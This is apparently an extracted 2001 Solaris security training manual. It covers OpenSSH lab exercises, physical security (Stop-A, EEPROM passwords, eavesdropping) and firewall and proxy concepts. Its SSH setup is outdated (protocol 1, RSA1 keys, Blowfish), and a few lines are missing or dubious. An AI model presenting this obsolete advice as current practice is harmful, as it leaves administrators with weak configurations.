13 # Site-wide defaults for various options1415 # Host *16 # ForwardAgent yes17 # ForwardX11 yes18 # RhostsAuthentication yes19 # RhostsRSAAuthentication yes20 # RSAAuthentication yes21 # PasswordAuthentication yes22 # FallBackToRsh no23 # UseRsh no24 # BatchMode no25 # CheckHostIP yes26 # StrictHostKeyChecking no27 # IdentityFile ~/.ssh/identity28 # Port 2229 # Protocol 2,130 # Cipher blowfish31 # EscapeChar ~

You can modify the file to:

● Specify the type of authentication used.

● Use a non-standard port.

● Specify the encryption algorithm used (the client determines thealgorithm used, as long as the server supports it).

● Change the location of the files where the client keys are stored.

● Prevent access to servers whose authentication key is not known tothe client (as opposed to warning the user that the key is unknownor changed). When this option is set, you must add new hosts to theknown_hosts file manually or by using the ssh-keyscan program.

● Use the Host directive to manage settings. You can make settingsglobally or make server-specific entries. The Host directive takes amachine name as an argument and restricts all settings (up until thenext Host directive, or the end of file) to apply to that server only.You can use the * and ? wildcards in the machine name, and you canspecify the default setting using Host * . For example, if the server atpluto.sun.com runs on a non-standard port (the default is 22), youcan specify this value by adding the following to the ssh_configfile:

Host pluto.sun.com Port 8022



Users can override these settings with command line options or their ownconfiguration file.

Note – Ensure that specific Host directives are placed later in the file thanthe less specific ones. For example, always place the default directivesfirst, otherwise the default directives override the previous ones.

Exercise: Using Secure Shell




● Install, configure, and use the secure shell

● Verify that transmissions sent by a user using the ssh program areencrypted

● Configure client keys

● Use the ssh-agent program to manage passphrases

Preparation

Ensure that any host access control set up in the files /etc/hosts.allowand /etc/hosts.deny is disabled (in other words, remove these twofiles).

Task – Using Secure Shell

Work in pairs to install a minimal configuration of the secure shell on aserver and a client.

Task – Installing OpenSSH

You can download OpenSSH from the Sun Freeware Web site; see“Additional Resources” on page 16-3. A copy has already beendownloaded and saved in the /usr/local/pkg directory. Install thisSVR4 package using the pkgadd command. You also must install theOpenSSL library which is available from the same Web site in the/usr/local/pkg directory.

Task – Using OpenSSH

In the next steps, you create the host key for the secure shell server.Similar steps are taken for creating keys for individual users, except thatthe file locations are different, and the server does not use a passphrasewith a key.



To create the host key:

1. As the root user on the server, use the ssh-keygen command togenerate the keys for the server. Use the default directory for the keylocation for this exercise. Press the Enter key when prompted for apassphrase.

2. When the host key has been generated, start the secure shell serverdaemon. Start it in debug mode with the sshd -d command. Ignoreany error messages regarding DSA host keys.

3. On the server and client machines, identify two user accounts to usewith the secure shell. The account name and shell type do not matter,although the following examples use the names alice and bob .

4. On the client machine, use the su command to change to user alice .

5. From the client machine, use the ssh command to connect to theserver as user bob .

6. If the command succeeded, the OpenSSH server is running correctly.Restart the sshd program (on the server machine), this time withoutthe debug flag. Use the ps program to ensure that the server isrunning.

Task – Checking Secure Shell Encryption

To check encryption:

1. On the client machine, log in as user alice . To test the encryption ofthe secure shell, verify that you can view clear text on the networkby using the snoop command as the root user in another window.Log user alice out of the rlogin session but leave the snoopcommand running in the other window.

2. From the client machine, use the ssh command to connect to theserver. Watch the window running the snoop command to see if theconnection is encrypted. When you are prompted for an answer to ayes or no question, type the full word. You must also enter thecorrect passphrase for the new user on the remote system.



Task – Configuring Client Keys

To configure client keys:

1. From the client, use the ssh program to run a command on theserver. Run the command who to see the logged on users on theserver. Add 2>/dev/null to the command to remove theenvironment variables from the output.

2. From the client, use the scp program to copy user alice ’sidentity.pub file to the /tmp directory on the server. Use2>/dev/null to remove the environment variables from the output.

3. From the server, add the identity.pub file you just copied to the/tmp directory to user bob’s authorized_keys file.

4. From user alice on the client machine, log in to the server as userbob . Do this without using bob’s passphrase. Use the access grantedfrom bob’s authorized_keys file.

Task – Using the ssh-agent Program

To use the ssh-agent program:

1. Run the ssh-agent program to configure your shell so that it hasaccess to the keys:

# eval ssh-agent

2. List the identities now available to the ssh-agent program.

3. Add a new identity to the agent.

4. List the identities now available.

5. Connect to another machine as user bob . You do not need to enterthe passphrase for the required key, because it is supplied by thessh-agent program.

6. If you have time, configure the client as a server and repeat theexercises in reverse order.

Exercise Summary


Exercise Summary

?!


● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions

This section provides the solutions for the exercises in this module.

Installing OpenSSH

Install OpenSSH using pkgadd . You also must install the OpenSSL library.

# cd /usr/local/pkg# pkgadd -d openssl-0_9_6-sol8-sparc-local# pkgadd -d openssh-2_5_1p1-sol8-sparc-local

Using OpenSSH

1. As the root user on the server, use the ssh-keygen command togenerate the keys for the server. Use the default directory for the keylocation for this exercise. Press the Enter key when prompted for apassphrase.

# ssh-keygen -f /etc/ssh_host_keyGenerating RSA keys: Key generation complete.Enter passphrase (empty for no passphrase): <enter>Enter same passphrase again: <enter>Your identification has been saved in /etc/ssh_host_key.Your public key has been saved in /etc/ssh_host_key.pub.The key fingerprint is:bf:b3:a6:8e:2d:b1:86:63:64:44:b4:6f:52:cc:7e:42 root@jeeves

Exercise Solutions


2. When the host key has been generated, start the secure shell serverdaemon. Start it in debug mode with the sshd -d command. Ignoreany error messages regarding DSA host keys.

# /usr/local/bin/sshd -ddebug: sshd version OpenSSH_2.2.0error: Could not load DSA host key: /etc/ssh_host_dsa_keyDisabling protocol version 2debug: Bind to port 22 on ::.Server listening on :: port 22.debug: Bind to port 22 on 0.0.0.0.Server listening on 0.0.0.0 port 22.Generating 768 bit RSA key.RSA key generation complete....

3. On the server and client machines, identify two user accounts to usewith the secure shell. The account name and shell type do not matter,although the following examples use the names alice and bob .

4. On the client machine, use the su command to change to user alice :

# su - alicePassword: password%

5. From the client machine, use the ssh command to connect to theserver as user bob :

% ssh -l bob grommitbob@grommit's password: passwordSun Microsystems Inc. SunOS 5.6 Generic August 1997

6. If the command succeeds, the OpenSSH server is running correctly.Restart the sshd program (on the server machine), this time withoutthe debug flag. Use the ps program to ensure that it is running:

# /usr/local/bin/sshd# ps -ef | grep sshd

root 1630 1 29 12:01:50 ? 0:08 /usr/local/bin/sshd

Exercise Solutions


Checking Secure Shell Encryption

1. On the client machine, log in as user alice .

login: alicePassword:Sun Microsystems Inc. SunOS 5.7 Generic August 1998

To test the encryption of the secure shell, verify that you can viewclear text on the network by using the snoop command as the rootuser in another window. Log user alice out of the rlogin sessionbut leave the snoop command running in the other window:

# snoopUsing device /dev/hme wallace -> grommit RLOGIN C port=1023.............

Open another window, and use the rlogin command to log in to theserver:

login: alicePassword:Sun Microsystems Inc. SunOS 5.6 Generic August 1997$ rlogin grommitPassword:Sun Microsystems Inc. SunOS 5.6 Generic August 1997$ lslocal.cshrc local.login local.profile$ exitConnection closed.$

You should see the clear text in the window running the snoopcommand.

Exercise Solutions


2. From the client machine, use the ssh command to connect to theserver. Watch the window running the snoop command to see if theconnection is encrypted. When you are prompted for an answer to ayes or no question, type the full word. You must also enter thecorrect passphrase for the new user on the remote system.

$ ssh grommitThe authenticity of host 'jeeves' can't be established.RSA key fingerprint is bf:b3:a6:8e:2d:b1:86:63:64:44:b4:6f:52:cc:7e:42.Are you sure you want to continue connecting (yes/no)? yesWarning: Permanently added 'jeeves' (RSA) to the list of known hosts.alice@jeeve's password: <enter password>Last login: Sat May 12 20:49:42 2001 from wallaceSun Microsystems Inc. SunOS 5.6 Generic August 1997$ lslocal.cshrc local.login local.profile

The window running the snoop command should not be displayingcleartext any longer, proving that the connection is encryptedbetween the client and server.

Exercise Solutions


Configuring Client Keys

1. From the client, use the ssh program to run a command on theserver. Run the who command to see the logged on users on theserver. Add 2>/dev/null to the command to remove theenvironment variables from the output.

$ ssh grommit who 2>/dev/nullalice@grommit's password: <enter password>bob ttyp0 May 11 14:00 (195.64.77.11)

2. From the client. use the scp program to copy user alice ’sidentity.pub file to the /tmp directory on the server. Use2>/dev/null to remove the environment variables from the output.

$ scp .ssh/identity.pub grommit:/tmp/ 2>/dev/nullalice@grommit's password: <enter password>identity.pub 100%|************************************************| 344 00:00

3. From the server, add the identity.pub file you just copied to the/tmp directory to user bob’s authorized_keys file.

% cp /tmp/identity.pub /home/bob/.ssh/authorized_keys

4. From user alice on the client machine, log in to the server as userbob . Do this without using bob’s password. Use the access grantedfrom bob’s authorized_keys file.

$ ssh -l bob grommitEnter passphrase for RSA key 'alice@wallace': <enter passphrase>Last login: Sat May 12 21:05:46 2001 from woosterSun Microsystems Inc. SunOS 5.6 Generic August 1997% iduid=1067(bob) gid=1067 groups=1067

Exercise Solutions


Using the ssh-agent Program

1. Run the ssh-agent program with sh as the command to execute(so that this shell has access to the keys):

% ssh-agent sh

2. List the identities now available to ssh-agent :

% ssh-add -lThe agent has no identities.

3. Add a new identity to the agent:

% ssh-addNeed passphrase for /export/home/alice/.ssh/identityEnter passphrase for alice@wooster: <enter passphrase>Identity added: /export/home/alice/.ssh/identity (alice@wallace)

4. List the identities now available to ssh-agent :

% ssh-add -l1024 49:4b:13:bb:6f:8e:46:d1:cd:f2:33:5b:04:99:bb:bd alice@wallace

5. Connect to another machine as user bob . You do not need to enterthe passphrase for the required key, because it is supplied by thessh-agent program.

% ssh -l bob grommitLast login: Tue May 15 16:18:22 2001 from wallace% iduid=1067(bob) gid=1067 groups=1067%


Module 17

Securing Physical Access

Objectives

Upon completion of this module, you should be able to explain and usemeasures to physically secure a system. Specifically, you should be able to:

● Justify the need for physical system security and define measuresthat enhance the physical system security

● Explain the potential weak points in a physical network

● Disable the STOP-A key

● Explain the role of the EEPROM password and security modes

Relevance


Relevance

?!

Discussion – All IT equipment is a potential target for a physical attack,both intentional and unintentional; fire, floods, and other emergencieshave no respect for controlled access to data centers.

● What harm can be done to a system or its data if an intruder canphysically access the machine?

● Is it only the computer that needs to be physically protected?


Securing Physical Access 17-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C





● Garfinkel, Simson and Gene Spafford. Practical UNIX & InternetSecurity. O’Reilly & Associates, Inc. 1996.

● Online manual pages for boot(1M) , eeprom(8) , kernel(1M) ,monitor(1M) , and system(4).


Assessing the Risk From Physical Intrusion



Modern computer networks are complex environments that have anumber of vulnerabilities. Not all attacks are launched by distantintruders. People with physical access to the systems and networks mightalso attempt to access data or impair functionality, for a variety of reasons.

Although it might seem more of a problem for military systems, physicalsecurity is also important for commercial systems because:

● The potential rewards from successful commercial espionage can runinto millions of dollars.

● Commercially sensitive data is held on machines both in the datacenter and in any office connected to the network.

● Commercially sensitive data is carried along the wires of the network.



Physical Intrusion Solutions

Solutions to physical intrusion onto a network are similar to those appliedto the computers themselves:

● Be aware of the potential for physical intrusion into the network.

● Control physical access to all IT equipment.

● Encrypt data sent over the network, especially if it is at all sensitive.



Types of Physical Intrusion

The types of physical intrusion can be classified as follows:

● Console access – An intruder gains direct access to the system bysitting at the console. This problem arises:

● When sessions are left logged-in

● When post-its with passwords written on them are left aroundthe workstation

● On systems (such as Microsoft Windows 98) that do not requirepasswords for access

● Damage to systems – An intruder with physical access can damage asystem and leave it inoperable.

● Data theft – Backup tapes or other removable media are stolen. Anintruder could even remove parts of a system containing data, suchas hard drives.



● Power outage – An intruder interferes with the supply of power tosystems and networks, causing a DoS attack. A sudden switching-offof servers, or routers, or other components is potentially as damagingas physically destroying the network.

● Network tapping – An intruder with physical access to the networkmonitors internal network traffic without having to defeat a firewall.

As with any risk, you must strike a balance between the likelihood ofattack and the cost of preventative measures.



Securing IT Equipment

Physical access to all IT equipment should be restricted to as few people aspossible and only to authorized personnel. While this should be possiblefor servers, it is difficult, if not impossible, to enforce for workstations(including PCs and laptop PCs).

Place all servers in restricted-access machine rooms or rooms that can belocked, and control who has access to those locations.

Where practical, put the workstation systems into locked cupboards andonly give users access to the screen, keyboard, and mouse. Use extensioncables for the peripheral equipment to facilitate this configuration.Consider removing or disabling removable media devices, such asdiskettes, CD-ROMs, tape backup, DVDs, and even the parallel port onPCs which can be used with portable disks and tape devices such asIomega Zip drives.

Note – It has been known for a site to use superglue to prevent diskettedevices from being used.



Use low-level EEPROM or BIOS security to enable administratorpasswords for all unsecured equipment, to ensure that only passwordholders can reboot systems into a maintenance or administration mode.Using passwords with SPARC equipment prevents an unauthorized userfrom booting the Solaris OE into single-user mode, which gives the userroot access.

Remember that users might have access to installation media andhardware diagnostic media which they can use to bypass some (or all) ofthe security measures in place, unless you prevent physical access to thesystem devices.



Implementing Physical Network Security

Network security is a vast and complex area due to the sheer scale ofmodern networks. Some of the network areas that must be secured are:

● Local Area Network (LAN)

● Routers

● Firewalls

● Wide Area Network (WAN)

● Physical cabling inside your organization’s buildings

● Physical cabling used by telecommunications companies

● Microwave transmissions as an alternative to physical cabling

● Satellite communications



Securing Network Infrastructure

This subject is too broad and specialized to be presented in this course.However, there are some techniques that you can use within yourorganization to remove some of the more obvious threats:

● Only allow authorized systems to connect to your network.

Do not allow consultants or contractors to use their own equipmentto access the network. Always provide them with a system to usewhich you have properly secured.

● Always use star network topologies connecting all systemsindividually back to a hub.

Do not use thick or thin ethernet cabling because it is easy to tapinto.

● Only connect required ports when using structured wiring systems.

Do not leave unused live ports in user-accessible areas, because theseports can be plugged into by unknown equipment.



● Audit the physical cables into hubs, switches, and routers on aregular basis.

All networks should have an approved network diagram, so that youcan check what is present against what should be present.

● Use a monitored hub.

● Use hubs that report—usually by means of a separate serial link—onthe status of their ports. While primarily intended as a means ofnetwork troubleshooting, they also provide a valuable tool forsecurity monitoring.

● Ask users to leave all computers switched on at all times and poll thecomputers on a regular basis to verify their identity. Use the low-level MAC address on the network card and maintain a database ofports to MAC address mappings to detect inconsistencies.

● Laptops are a problem area because you would not expect them tobe left in the office overnight, but it is still possible to verify whethera MAC address is that of a known machine. Laptop users can alsochange network PC cards that have different MAC addresses. It isbetter to have a few false alarms than an intruder attacking yournetwork.

● Always lock communications rooms containing hubs, routers, patchpanels, and other network infrastructure.

● Do not allow users to plug into hubs or change patch panel settings.

● Try to use fiber optic cables if possible.

It is a lot harder to tap into a fiber cable than an electrical cable.



Appraising the Risk of Eavesdropping

One final consideration is the electrical equipment itself. All electricalcables leak a certain amount of electromagnetic radiation which can bedetected by specialized monitoring equipment (essentially a sophisticatedradio receiver). This eavesdropping equipment is expensive but can workat a range of a few hundred yards (meters).

Some products can pick up monitor screen radiation and reconstruct thescreen image in real time. Some movement detectors can track key pressesand mouse movements remotely.

The central processing unit (CPU) in a server or workstation is alsovulnerable. The type of electromagnetic signal generated by the processor,when performing what is known as “big number” arithmetic, is highlycharacteristic and can be scanned. It is possible to analyze the signal andreconstruct the content of the registers at the time of the scan, therebyproviding the exact numbers used in the encryption engine.



This might sound like science fiction but these products exist and they areused. They might not be 100 percent accurate, cheap, or easy to use but,given time and development, they will become foolproof. The filmEntrapment (Twentieth Century Fox, 1999) showed how physicalmonitoring can gather sensitive information as part of a plot to break intoa multi-national banking system. This might be a fictional plot line, but donot assume that it cannot happen in the real world. Attacks of this naturehave been made.

The solution to these forms of attack is to audit the location of thesensitive device (monitor, CPU, and so on). Establish the level of risk and,if necessary, “screen” off electromagnetic radiation with a Farraday cage,that is, an earthed “box” of a conductive material to absorb the emittedelectromagnetic radiation.

Note – In the nineteen eighties, the U.S. government developed acertification system called TEMPEST which rates a computer equipment’ssusceptibility to radio eavesdropping. It is now possible for rooms andeven whole buildings to be TEMPEST certified.

How Secure Is Your Network?

With regard to your own offices, consider the following:

● How many of the computer screens and keyboards can be seenthrough windows from nearby buildings?

● Do any of your network cables run within 100 yards of a road,parking lot, park, shop, or anywhere else where the public canlegitimately walk by or stop?



Using Encryption

The pessimistic way of looking at data security is to assume that allphysical security is compromised and that data can be read by anyone.Encryption provides a fallback for ensuring that sensitive data is onlyaccessible to authorized personnel.

It must be understood that there is no such thing as unbreakableencryption. Any current crypto-system can be analyzed given enough time.It is the aim of the cryptographer to lengthen that timespan. Nevertheless,some commercial crypto-systems are so effective that it would takedecades or even centuries to crack them.

The case for and against encryption can be summarized as follows:

● Benefits of encryption:

● Data is secured from unauthorized access, even when madepublic.

● Data is easily restricted by key management on a need-to-knowbasis.



● Problems associated with encryption:

● The additional encryption layer slows data access.

● Keys must be managed and kept secure. A key that becomesknown is no longer secure.

● If the decryption key is lost, the related data is also lost.



Strengthening Help Desk Processes

The most common form of a security break-in is when an intruder phonesthe help desk or an administrator and asks for the password on anaccount to be reset. As long as the intruder knows a valid account name,this attack succeeds more times than it fails.

As a result, many help desks implement safeguards to ensure that the userrequesting the password change is the owner of the account. That is, theyauthenticate the user who is requesting the change.



User Authentication Techniques

The following is a list of some common user-authentication techniques,along with their disadvantages:

● Ask users to physically go to a help desk to be verified:

● Help desk staff might not know every person by sight.

● Even when this approach is backed up with the use of user IDbadges, ID badges can be falsified or stolen.

● Users and the help desk might not be located within closeproximity of each other.

● Ask users to supply additional identification information such as apersonnel number or a passphrase created when the user’s accountwas created:

● This form of additional data can easily be discovered bylistening to a valid user talking to the help desk, or by browsingcompany documentation.



● Passphrases must be memorable to users (and thereforeguessable by intruders), and they must be stored somewherewhere they can be accessed by help desk staff, therebycompounding the security risk.

● Ask users to email requests from another system:

● Not all users have accounts on more than one system andnetworks based on NIS+, Microsoft Windows NT, Netware, orKerberos effectively use single network login mechanisms toaccess all systems.

● SMTP email can be easily spoofed.

● Ask users to submit a written request signed by their supervisor ormanager. Intruders can forge the written request so then help deskstaff must contact the supervisor concerned and verify authorizationof the password change. This is a slow process (supervisors might bein meetings) which penalizes legitimate users who cannot continueworking while the password is being reset.

● Confirm user identity by phoning the user back on their knownextension (or mobile phone):

● Intruders might be at the user’s desk or have borrowed theuser’s phone.

● Genuine users might not be able to get to their usual phone.

● Not all users have individual phones, and often a supervisormust be contacted instead of the user.

● Phones can use redirection and call-forwarding to transparentlyroute the call to any other phone.

● Use a trusted third party, such as a supervisor or manager, to makethe request and receive the password:

● The trusted third party still has to be authenticated.

● This solution reduces the number of users who can ask forpassword changes, which can slow operations in a largeorganizations.

Regrettably, there is no effective solution to the problem of authenticatinguser identity. Nevertheless, any of the above precautions are better thanhaving none in place at all.

Applying Physical Security Measures



Any software security system that can be started on a machine can also bestopped. This is the major weakness of software security. Securingphysical access to a workstation or server is, therefore, every bit asimportant as taking software measures.



The Stop-A Key

On hardware based on SPARC technology, the OpenBoot utility interactswith the hardware to control access to the system. From the point of viewof security, the most serious risk of intrusion is the Stop-A keycombination. If the Stop key and the A key are held down on thekeyboard of the physical machine (not from a terminal) at the same time,the effect suspends all Solaris OE activity and returns the system to thecommand monitor (OpenBoot ).

From the OpenBoot monitor a user can:

● Reboot the system in single user mode, gaining access to the systemas the root user.

● Examine memory contents, potentially picking up key information.Many files are cached in memory and it is quite likely that the/etc/shadow information can be found.

● Load data from physical devices, allowing the user access to any fileon the disk, bypassing all security checks.



Disabling the Stop-A Key

Disable the Stop-A key by adding the following line to the /etc/systemfile:

set abort_enable = 0

Remove this line or set it as follows to enable the Stop-A key:


Alternatively, uncomment the following entry to the /etc/default/kbdfile:

KEYBOARD_ABORT=disable

Reboot the system after changing the /etc/system or/etc/default/kbd files because these files are only read when thesystem boots up.



Enabling EEPROM Security

Workstations are generally contained in reasonably secure areas, even ifonly in an office. However, there are circumstances in which it is advisableto further protect against physical access to a system. You could use someform of physical keyboard lock. You could also consider the option ofEEPROM password control.

If an intruder has access to low-level firmware software (the EEPROMmonitor), they can alter low-level system functionality. They could bringthe system to a low-run level, then make alterations to the kernel orprogrammable read-only memory (PROM) level functions. To do this, theintruder must be physically at the computer that they are attempting tobreak–in to. In addition to physical presence, this type of attack alsorequires significant knowledge of the system concerned. Nevertheless, thistype of attack could be a security concern.



Note – Most manufacturers provide a means of changing EEPROM data.This can differ from one type of hardware to another, and great care mustbe taken not to corrupt a system accidentally. The following techniquediscusses the OpenBoot utility and is applicable only to hardware basedon SPARC technology. Check with your hardware vendor before usingthis technique.

Hardware based on SPARC technology provides a security lock at theEEPROM level. Set the security level from the OpenBoot prompt(EEPROM level) or by using the eeprom(1m) command.

By using the eeprom command with the proper options, you can assign apassword and security level to the machine. After issuing the command,reset the system. From then on, a password is required each time toperform specific commands when the system has been brought to theOpenBoot (EEPROM) prompt.

OpenBoot runs in two modes:

● Full access, where all commands are available

● Restricted access, where only the c (continue) , b (boot ), andn (none) commands are available for returning to full access



There are three levels of EEPROM security:

● none – Full access to the OpenBoot where any command can betyped and no password is required.

● command– Restricted access, where the user can use the c or bcommands without a password. A password is required if the userwants to use the n command to return to full access, or if a parameteris used with the b command (for example, to boot single-user mode).

● full – Restricted access where all commands except c require apassword.

Warning – Do not attempt to change the EEPROM during this course. Iffor any reason the password is forgotten or unavailable, the computer isrendered useless. To remedy the situation, the EEPROM device should bephysically removed from the system and reprogrammed.



EEPROM Passwords

To set the EEPROM security mode to command, use the followingcommand:

# eeprom security-mode=command

When the EEPROM security mode is set to a value other than none, setthe security password with:

1 # eeprom security-password=2 Changing PROM password:3 New password: ******4 Retype new password: ******

If you enter an incorrect password, the system delays for approximately10 seconds before displaying the boot prompt again.

The number of times that an incorrect password is entered is stored in thesecurity-#badlogins variable of the non-volatile random accessmemory (NVRAM). Check the value of this parameter to see if someonehas attempted to use the EEPROM monitor without knowing thepassword.



Use the command below to check the number of login attempts:

# eeprom security-#bad-loginssecurity-#bad-logins=0

Exercise: Working With Physical Security


Exercise: Working With Physical Security


● Disable the Stop-A key

● Consider the physical security of your own systems

Preparation


Task – Disabling the Stop-A Key

Use the Stop-A key to access the OpenBoot firmware and browse the helpinformation. Resume your system operation and disable the Stop-A key.Verify that you can no longer use the Stop-A key.

Re-enable the Stop-A key.

Task – Considering the Physical Security of YourSystems

This is a pen and paper exercise. List your thoughts under the followingheadings:

● How is physical access to your data centers controlled?

● How is physical access to your networking equipment controlled,especially hubs, switches, and routers not located in the data centers?

● Do your users have access to physical workstations (including PCs)rather than having access only to screens, keyboards, and mice?

● Do you allow contractors or consultants to plug their ownequipment into your network?

Exercise Summary


Exercise Summary

?!


● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions

This section provides the solutions for the exercises in this module.

Disabling the Stop-A Key

Use the Stop-A key to access the OpenBoot firmware and browse the helpinformation.

Resume your system operation and disable the Stop-A key by adding thefollowing line to the /etc/system file:


Reboot the system for this change to take effect.

Verify that you can no longer use the Stop-A key.

Re-enable the Stop-A key by removing from the /etc/system file the linethat you added earlier.

Reboot the system for this change to take effect.

Considering the Physical Security of Your Systems

Only you or someone in your organization can answer these questions.


Module 18

Connecting the Enterprise Network to theOutside World

Objectives


● Explain the importance and role of firewalls, proxy servers, and otherenterprise network security components

● Describe ongoing security tasks

● Explain the role of security audits

● List common sources of security information

Relevance


Relevance

?!

Discussion – By now, you are aware of the potential dangers tonetworked hosts. However, it is not ideal to rely solely on host security toensure enterprise security when connecting to external networks, such asthe Internet.

● What types of technologies might be used to protect an enterprisenetwork when connected to the Internet?


Connecting the Enterprise Network to the Outside World 18-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C



● Zwicky, Elizabeth D., Simon Cooper and D. Brent Chapman. BuildingInternet Firewalls. 2nd Edition. O’Reilly & Associates, 2000.

● Cheswick, Bill and Steve Bellovin. Firewalls and Internet Security:Repelling the Wily Hacker. Addison Wesley, 1994.

● Comer, Douglas and David Stevens. Internetworking with TCP/IP.Vols. I (1997), II (1998), and III (2000). Prentice Hall.

Designing the Network to Improve Security



The primary reason to network computers together is communication.Unfortunately, given the widespread status of virus and Trojan code, andwith increasing numbers of potential intruders present on the Internet, adefensive strategy is vital. The corporate network, the data it holds, andthe hosts that form part of it are all valuable assets that need protectionfrom improper use.

You can use various tools and products to secure the boundary betweenthe enterprise network and the outside world. This section looks at thecommon components and the ways in which they are applied.



Improving Security With a Firewall

The term firewall is used in different ways by different people. However,the primary objective of a firewall is to monitor all network trafficbetween two networks (usually a corporate network and the Internet),and to block and log inappropriate traffic. A firewall can be made up ofmultiple components, including (but not limited to):

● Packet filters that control access to the network based on the sourceor destination IP address of a packet

● Proxies, which hide the real address of a host on the corporatenetwork when the host connects to the outside world

● Protocol-based software that uses knowledge of higher–levelprotocols, such as TCP or SMTP, to identify dubious network activity

The firewall functionality can be spread across multiple hosts and routers,or it can be encapsulated within a single host. When people talk aboutinstalling a firewall, they are frequently referring to the installation of apiece of software that includes some or all of these components.



Firewall software is based on rules. Some rules act to specifically allowparticular types of network traffic between certain network addresses.Other rules explicitly block network traffic, by dropping the networkpackets. For each type of packet (or datagram), a separate rule can beestablished, either permitting or blocking the passage of the data. Implicitrules cover those packets not accounted for by the explicit rules.

Ideally, the two networks that a firewall manages should be separated ondifferent network adapters and on different subnets. As always withsecurity, it is prudent to assume that no firewall is subversion-proof.Therefore, if the two networks (the “outside” network and the “inside”network) are physically separated, and exist with differing subnetsettings, it follows that if the firewall fails, the connection between the twonetworks must also fail. (The converse is that, the firewall fails, thenetwork is left exposed.) In other words, the firewall should “fail closed”rather than “fail open.”

Firewalls do not prevent attacks by virus or Trojan writers, but they arehighly effective at preventing intrusion. Firewalls have another, perhapsmore important function. Companies frequently have extremely valuabledata stored on their networks. It is quite easy for someone to inadvertently(or intentionally) publish such data on the company intranet. A firewallcan prevent that data from being visible to the outside world unless it isloaded onto an audited portal.

One of the most important features of firewalls is logging. There are twologging features:

● log on success – Events resulting in passage through the firewall arelogged.

● log on deny – Events resulting in refusal of passage through thefirewall are logged (this is the more usual option).

Examination of the firewall log can be most informative. For example,attempts by a user to connect to one of the Internet virtual hard drivesmight indicate an attempt to pass company-confidential data outside thecompany; port scans from the outside are an early indication thatsomeone is preparing an attack on your system.



Using Solaris SunScreen Firewall

SunScreen software is a firewall designed to operate with the Solaris OE.As with other firewalls, there is a server, called the screen, and anadministration tool, designed to allow insertion and implementation ofrules.

SunScreen comes in two versions:

● SunScreen Secure Net 3.1 is a full-featured firewall product designedto be deployed throughout an organization to implement a securebusiness network including extranets, secure intranets, and remoteaccess.

● SunScreen 3.1 Lite is a firewall product designed to protectindividual servers or very small workgroups.



SunScreen software can support up to 15 separate network interfaces,meaning that up to 15 potential net-cards can be supported. This makesSunScreen one of the more powerful firewalls. Another advantage inusing SunScreen software is that it incorporates a useful proxy-servercapability.

High availability configuration enables SunScreen software to quicklyrecover to a second screen without losing firewall or encryption sessions.If a firewall is successfully attacked and goes offline, the high–availabilityfeatures enable a second firewall to take over the compromised firewall orencryption sessions.

SunScreen consists of a rules-based, dynamic packet-filtering engine fornetwork access control, and an encryption and authentication engine thatenables the creation of secure virtual private network (VPN) gateways byintegrating public-key encryption technology.

SunScreen’s “stealth” capabilities refer to the ability to configure thescreen such that it cannot be accessed using an IP address. This providestwo benefits for securing a network:

● Potential intruders cannot access the machine running SunScreenSecure Net, making it extremely difficult to compromise this system.

● Installation of SunScreen Secure Net is easier because it can beinstalled without changing the routing tables.

SunScreen uses open-standard SKIP (Simple Key-management forInternet Protocols) technology for encryption, authentication, accesscontrol, and secure VPN’s. SunScreen SKIP includes support for manystrong, standards-based authentication, encryption, and integritytechnologies, including 4096-bit Diffie-Hellman modulus and the newDiffie-Hellman primes.

Evaluating IPsec as a Firewall Replacement

You might think that IPsec does away with the need for a firewall. Somepeople would argue that adopting IPsec removes the problem ofunknown hosts infiltrating the system. It is possible to configure IPsec insuch a way that only fully authenticated, encrypted data passes onto agiven network. The problem is that when you configure IPsec in this way,it is almost certain that you will lose all Internet connectivity, and a lot ofother inter-networking as well.



It is therefore better to regard the two technologies—a firewall andIPsec—as complementary. IPsec controls the basic flow of IP traffic ontothe network, and the firewall provides a suitable bottleneck for restrictingthe types of packets transferred between networks.



Using Routing Security Features

Routers are devices (usually, but not always, hardware) that redirectpackets from one network (or subnetwork) to another network. It is notaccidental that this description of a router resembles the description of afirewall. In many respects, firewall software performs the same tasks as arouter. Many firewalls use one or more routers as part of the overallsecurity solution, largely due to the ability of routers to filter packets asthey pass them from one network to the other. The rules that govern thisfiltering are usually held in EEPROM.

There are many different types of routers available, and each isprogrammed in a slightly different manner. Some of the more commontypes are shown in Table 18-1.

Table 18-1 Common Types of Router

Type Normal Usage

Simple Connection between LANs

Gigabit High bandwidth, ultra high-speed routing



Routers operate by means of routing tables. Typically, these include thefollowing information:

● The name of the route (for convenience only).

● The active status of the route (active or inactive).

● Destination IP address – Routers work between IP addresses. Thedestination address can be (and might well be) a gateway to anothernetwork.

● IP subnet mask – Routers typically redirect packets betweennetworks. This means that redirection between subnets is alsopossible, and advisable.

● Gateway IP address – If packets are destined for a local network,they are passed directly to the host. If they are destined for any othernetwork, they are passed to the next gateway (router), as defined bythis address.

● Private (true or false) – Routes can be public or private. While theterminology might differ, this usually implies that special filtering orencryption is applied.

● Filters – Filters comprise a separate set of tables, each containing arecognized fragment of an IP packet type. As with firewall software,the packets identified by the filters can be allowed or disallowed.

You can control and restrict packets attempting to leave the system byapplying the correct filters and suitable encryption.

DSL Managed asynchronous connection

ISDN Combination of an ISDN 2e terminal adapterwith a limited function router (usuallylimited to 10 static routes)

PSTN Combination of an PSTN modem with alimited function router (usually limited to 10static routes)

Table 18-1 Common Types of Router (Continued)

Type Normal Usage



Masking Hosts Using a Proxy Server

In its simplest form, a proxy server stands in for an IP client connecting tothe outside world. The proxy has an IP address of its own (usually0.0.0.0 ). When a client makes a request for a connection, the proxyforwards the connection to the original target, but the request registers ashaving originated from the proxy, not the requester. At the same time,requests can be filtered through the proxy (for example, for restricted orunsuitable sites), and outgoing data can be blocked or allowed accordingto type and origin. Returned data can likewise be checked for typesuitability. Unsuitable content (Java technology code or ActiveX controls)can be blocked, or even removed. Because the request comes from a singledaemon, it is safe to block non-essential ports (to prevent port scanattacks) and impossible for the outside world to establish the IP addressof the original requester, or indeed to perform any analysis of theconnection.



